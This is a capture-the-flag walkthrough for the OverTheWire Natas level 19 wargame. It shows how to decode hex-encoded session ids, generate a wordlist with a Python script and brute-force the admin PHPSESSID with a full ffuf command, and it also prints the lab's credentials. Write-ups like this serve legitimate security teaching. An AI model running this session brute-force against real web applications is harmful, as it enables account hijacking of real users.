Level 18 - Level 19
Username: natas19
Password: 8LMJEhKFbMKIL2mxQKjv0aEDdk7zpT0s
URL: http://natas19.natas.labs.overthewire.org
Overview
This time we got the same login page that we got in the last level and its clearly mentioned that the source code is almost same, but the session id's will be random.

Let's first get the session id by trying to login with some random credentials.

Decoding the Cookie
The session id we got was some random encoded string. I tried to decode the session id's by some basic encoding schemes in cyber chef and was able to decode the string using From Hex
scheme.

The string that we got after decoding is <id>-admin
.
Brute-forcing Session ID
Since we know all the possible id's, we can generate a word list of all possible <id>-admin
sessions ids with Hex encoding. The wordlist can be generated using the following python script.
#! /usr/bin/python
wordlist = open("hex_640.txt", "w")
cookies = [f"{i}-admin".encode("utf-8").hex() + "\n" for i in range(0, 641)]
wordlist.writelines(cookies)
wordlist.close()
Now we have successfully generated the word list by executing the above python script.

Now its time to use ffuf to brute-force the session id's.
ffuf -w hex_640.txt:FUZZ \
-u $'http://natas19.natas.labs.overthewire.org/index.php' \
-X $'POST' \
-H $'Host: natas19.natas.labs.overthewire.org' \
-H $'Content-Length: 31' -H $'Cache-Control: max-age=0' \
-H $'Authorization: Basic bmF0YXMxOTo4TE1KRWhLRmJNS0lMMm14UUtqdjBhRURkazd6cFQwcw==' \
-H $'Upgrade-Insecure-Requests: 1' \
-H $'Origin: http://natas19.natas.labs.overthewire.org' \
-H $'Content-Type: application/x-www-form-urlencoded' \
-H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36' \
-H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' \
-H $'Referer: http://natas19.natas.labs.overthewire.org/' \
-H $'Accept-Encoding: gzip, deflate, br' \
-H $'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
-H $'Connection: close' \
-b $'PHPSESSID=FUZZ' \
-d $'username=admin&password=somoene' \
-fr "You are logged in as a regular user."
From the results of ffuf
, we can get the valid admin cookie.

Getting the Password
Now let's replace the session id with the id we found using ffuf and refresh the page to get the credentials for next level.

Last updated
Was this helpful?